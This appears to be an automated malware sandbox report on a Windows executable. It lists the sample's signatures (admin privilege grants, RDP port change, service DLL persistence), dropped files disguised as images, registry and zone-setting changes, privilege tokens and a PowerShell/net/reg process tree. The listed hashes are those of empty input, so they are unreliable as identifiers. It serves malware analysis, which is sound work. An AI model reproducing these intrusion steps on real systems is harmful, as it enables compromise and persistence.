SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Analysis: behavioral2

Detonation Overview

Submitted

2021-09-24 19:05

Reported

2021-09-24 19:10

Platform

win10-en-20210920

Max time kernel

115s

Max time network

119s

Command Line

"C:\Users\Admin\AppData\Local\Temp\5367615a3d3f95eeab592a53716ed3bb.exe"

Signatures

Grants admin privileges

Modifies RDP port number used by Windows

Sets DLL path for service in the registry

persistence

UPX packed file

upx

Loads dropped DLL


Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\branding\wupsvc.jpg C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGICB3.tmp C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\mediasrv.png C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\mediasvc.png C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\branding\mediasrv.png C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGID92.tmp C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGID52.tmp C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\Basebrd C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\ShellBrd C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_sduftrvg.eqj.ps1 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_zm5tuu4o.kou.psm1 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGID02.tmp C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGID32.tmp C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\branding\mediasvc.png C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\branding\wupsvc.jpg C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Icon = "inetcpl.cpl#001313" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Description = "Your computer" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Description = "This zone contains Web sites that you trust not to damage your computer or data." C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Icon = "inetcpl.cpl#00004481" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\ftp = "3" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map\e1be3f182420a0a0 = ",33,HKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones," C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\DisplayName = "Local intranet" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\CurrentLevel = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Description = "This zone contains Web sites that could potentially damage your computer or data." C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\http = "3" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\PMDisplayName = "Local intranet [Protected Mode]" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\DisplayName = "Internet" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\PMDisplayName = "Trusted sites [Protected Mode]" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\CurrentLevel = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\1400 = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\PMDisplayName = "My Computer [Protected Mode]" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\@ivt = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\knownfolder = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\DisplayName = "My Computer" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyByPass = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent = "Mozilla/4.0 (compatible; MSIE 8.0; Win32)" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\PMDisplayName = "Local intranet [Protected Mode]" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map\57fd7ae31ab34c2c = ",33,HKCU,SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache\\Extensible Cache," C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Description = "This zone contains Web sites that you trust not to damage your computer or data." C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\PMDisplayName = "My Computer [Protected Mode]" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\PMDisplayName = "Computer [Protected Mode]" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\DisplayName = "Restricted sites" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\16\52C64B7E C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Icon = "inetcpl.cpl#001313" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\PMDisplayName = "Restricted sites [Protected Mode]" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Flags = "33" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\1200 = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\LowIcon = "inetcpl.cpl#005422" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Flags = "33" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\DisplayName = "Restricted sites" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\system32\reg.exe N/A

Runs net.exe

Script User-Agent

Description Indicator Process Target
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A

Suspicious behavior: LoadsDriver


Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1860 wrote to memory of 2796 N/A C:\Users\Admin\AppData\Local\Temp\5367615a3d3f95eeab592a53716ed3bb.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1860 wrote to memory of 2796 N/A C:\Users\Admin\AppData\Local\Temp\5367615a3d3f95eeab592a53716ed3bb.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2796 wrote to memory of 3428 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 2796 wrote to memory of 3428 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 3428 wrote to memory of 1268 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 3428 wrote to memory of 1268 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 2796 wrote to memory of 2196 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2796 wrote to memory of 2196 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2796 wrote to memory of 3676 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2796 wrote to memory of 3676 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2796 wrote to memory of 2916 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2796 wrote to memory of 2916 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2796 wrote to memory of 1008 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 2796 wrote to memory of 1008 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 2796 wrote to memory of 3660 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 2796 wrote to memory of 3660 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 2796 wrote to memory of 808 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 2796 wrote to memory of 808 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 2796 wrote to memory of 516 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\net.exe
PID 2796 wrote to memory of 516 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\net.exe
PID 516 wrote to memory of 3020 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 516 wrote to memory of 3020 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2796 wrote to memory of 1140 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 2796 wrote to memory of 1140 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 1140 wrote to memory of 3676 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1140 wrote to memory of 3676 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3676 wrote to memory of 584 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 3676 wrote to memory of 584 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 584 wrote to memory of 2920 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 584 wrote to memory of 2920 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2796 wrote to memory of 528 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 2796 wrote to memory of 528 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 528 wrote to memory of 1236 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 528 wrote to memory of 1236 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1236 wrote to memory of 1624 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 1236 wrote to memory of 1624 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 1624 wrote to memory of 1580 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
